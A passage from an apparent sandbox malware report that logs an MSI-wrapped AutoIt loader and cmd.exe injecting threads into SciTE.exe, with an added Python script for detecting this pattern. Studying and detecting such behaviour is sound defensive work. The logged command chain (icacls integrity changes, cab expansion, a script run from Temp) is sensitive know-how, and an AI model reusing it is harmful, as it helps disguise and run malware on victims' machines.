Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4910000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4950000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4990000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 49D0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4A10000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4A50000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4A90000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4AD0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4B10000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4B50000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4B90000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4BD0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4C10000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4C50000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4C90000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4CD0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4D10000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4D50000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4D90000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4DD0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4E10000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4E50000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4E90000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4ED0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4F10000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4F50000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4F90000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4FD0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5000000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5180000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 51C0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5200000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5240000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5280000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 52C0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5300000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5340000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5380000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 53C0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5400000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5440000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5480000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 54C0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5500000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5540000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5580000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 55C0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5600000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5640000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5680000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 56C0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5700000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5740000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5780000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 57C0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5800000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5840000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5880000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 58C0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5900000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5940000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5980000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 59C0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5A00000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5A40000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5A80000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5AC0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5B00000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5B40000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5B70000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5CF0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5D30000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5D70000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5DB0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5DF0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5E30000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5E70000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5EB0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5EF0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5F30000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5F70000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5FB0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5FF0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 6030000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 6070000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 60B0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 60F0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 6130000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 6170000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 61B0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 61F0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 6230000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 6270000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 62B0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 62F0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 6330000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 6370000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 63B0000
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe" UGtZgHHT.au3
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe C:\Program Files (x86)\common files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
Source: C:\ProgramData\fkeabad\Autoit3.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe C:\Program Files (x86)\autoit3\SciTE\SciTE.exe
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Process created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Process created: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe C:\Program Files (x86)\common files\microsoft shared\MSInfo\msinfo32.exe
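Two things in the behavior lines above carry the detection value: the process chain (msiexec.exe raises the integrity level of the MW-<GUID> Temp folder with icacls, unpacks files.cab with expand.exe, runs the dropped Autoit3.exe on UGtZgHHT.au3, and that interpreter spawns cmd.exe, which in turn launches legitimately installed binaries such as SciTE.exe, ADelRCP.exe, OLicenseHeartbeat.exe and msinfo32.exe) and the roughly two hundred "Thread created" records in which cmd.exe starts threads at distinct entry points inside SciTE.exe, which is what the "thread injection" signature in the overview refers to. The script below is an added example for triaging such output; it is not part of the Joe Sandbox report or of any product. It embeds a constructed sample of seven lines copied from this report (with the separators normalised), and flags remote-thread fan-out from one process into another, an AutoIt interpreter started from a user's Temp directory with a .au3 or .a3x argument, and the parent chain that ties the injecting cmd.exe back to msiexec.exe. The fan-out threshold of 3, the function names and the record layout are this example's own choices.

```python
"""Triage helpers for sandbox 'Process created' / 'Thread created' lines (added example)."""
import re
from collections import defaultdict

# Constructed sample: seven lines copied from the report above, separators normalised.
SAMPLE_LOG = r"""
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2770000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 27B0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 27F0000
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe" UGtZgHHT.au3
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe C:\Program Files (x86)\autoit3\SciTE\SciTE.exe
"""

THREAD_RE = re.compile(r"^Source: (?P<src>.+?) Thread created: (?P<dst>.+?) EIP: (?P<eip>[0-9A-Fa-f]+)$")
# The created image is the first path ending in .exe; whatever follows is its command line.
PROC_RE = re.compile(r"^Source: (?P<src>.+?) Process created: (?P<dst>.+?\.exe)(?: (?P<cmdline>.*))?$",
                     re.IGNORECASE)
SCRIPT_EXT = (".au3", ".a3x")   # AutoIt source and compiled-script extensions


def parse_behavior_lines(log):
    """Split report lines into thread-creation and process-creation records (dicts)."""
    threads, procs = [], []
    for line in log.splitlines():
        line = line.strip()
        if not line:
            continue
        m = THREAD_RE.match(line)
        if m:
            threads.append(m.groupdict())
            continue
        m = PROC_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["cmdline"] = rec["cmdline"] or ""
            procs.append(rec)
    return threads, procs


def remote_thread_fanout(threads, threshold=3):
    """Return (source, target, count) for every pair where `source` started at least
    `threshold` threads at distinct entry points inside a *different* process image.
    Same-image threads are ignored: a process creating threads in itself is normal."""
    eips = defaultdict(set)
    for t in threads:
        if t["src"].lower() != t["dst"].lower():
            eips[(t["src"], t["dst"])].add(t["eip"].upper())
    return [(src, dst, len(e)) for (src, dst), e in eips.items() if len(e) >= threshold]


def script_interpreter_from_temp(procs):
    """Flag an AutoIt interpreter launched from a user's Temp folder with a script argument."""
    hits = []
    for p in procs:
        image = p["dst"].lower()
        if "\\appdata\\local\\temp\\" in image and image.endswith("autoit3.exe"):
            scripts = [a for a in p["cmdline"].split() if a.lower().endswith(SCRIPT_EXT)]
            if scripts:
                hits.append({"parent": p["src"], "image": p["dst"], "script": scripts[0]})
    return hits


def ancestry(procs, image):
    """Walk creator links (child image -> first image seen creating it) upward from
    `image`; stops at the root of the log or on a cycle. Returns [image, parent, ...]."""
    parent = {}
    for p in procs:
        parent.setdefault(p["dst"].lower(), p["src"])
    chain, seen = [image], {image.lower()}
    while chain[-1].lower() in parent:
        nxt = parent[chain[-1].lower()]
        if nxt.lower() in seen:
            break
        chain.append(nxt)
        seen.add(nxt.lower())
    return chain


if __name__ == "__main__":
    threads, procs = parse_behavior_lines(SAMPLE_LOG)
    for src, dst, n in remote_thread_fanout(threads):
        print(f"[injection] {src} -> {dst}: {n} remote threads at distinct EIPs")
    for h in script_interpreter_from_temp(procs):
        print(f"[loader] {h['parent']} ran {h['image']} with {h['script']}")
    print("[chain] " + " <- ".join(ancestry(procs, r"C:\Windows\SysWOW64\cmd.exe")))
```

Against the full report the fan-out count for the cmd.exe to SciTE.exe pair would be in the hundreds rather than 3; the threshold only needs to be high enough to skip the occasional single remote thread that installers and accessibility tools legitimately create. The same three checks map directly onto EDR telemetry (remote thread creation, process creation with parent image and command line), so the logic ports to a Sigma or EQL rule without change.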
Source: Autoit3.exe, 00000008.00000003.562124824.0000000004685000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004474000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.565469736.0000000000A36000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: cmd.exe, 00000009.00000002.614013393.00000000033C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerabad\V
Source: SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Manager8.6
Source: SciTE.exe, 00000018.00000002.812058550.00000000006FA000.00000004.00000020.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.763757164.0000000000732000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerST
Source: cmd.exe, 00000009.00000002.616883860.0000000005FBC000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.617261525.00000000063BE000.00000004.00000010.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.820550875.000000000972E000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: cmd.exe, 00000009.00000002.614013393.00000000033E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerkeabad
Source: SciTE.exe, 00000018.00000002.812058550.00000000006FA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerabad\
Source: Autoit3.exe, 00000008.00000002.566996482.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.568412536.0000000004958000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.566222341.0000000001337000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: cmd.exe, 00000009.00000002.617175946.000000000627E000.00000004.00000010.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.617463634.000000000693E000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: Program Managerifier x64 External Package - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com
Source: cmd.exe, 00000009.00000002.614013393.00000000033E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerVGg
Source: SciTE.exe, 00000018.00000002.812058550.00000000006FA000.00000004.00000020.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.763757164.0000000000732000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerkeabad;
Source: SciTE.exe, 00000018.00000002.820550875.000000000972E000.00000004.00000010.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.820725792.0000000009CAE000.00000004.00000010.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.820504444.00000000095EE000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: tProgram Manager
Source: cmd.exe, 00000009.00000002.614013393.00000000033C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerVG
Source: cmd.exe, 00000009.00000002.614290853.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: program manager
            Source: cmd.exe, 00000009.00000003.580764198.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614013393.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.582186478.00000000033E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerisoft
            Source: cmd.exe, 00000009.00000002.614290853.0000000004E60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: program manager<
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeCode function: RegOpenKeyExA,GetLocaleInfoA,LoadLibraryExA,LoadLibraryExA,9_2_00405D90
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\ProgramData\fkeabad\Autoit3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\ProgramData\fkeabad\Autoit3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\ProgramData\fkeabad\Autoit3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
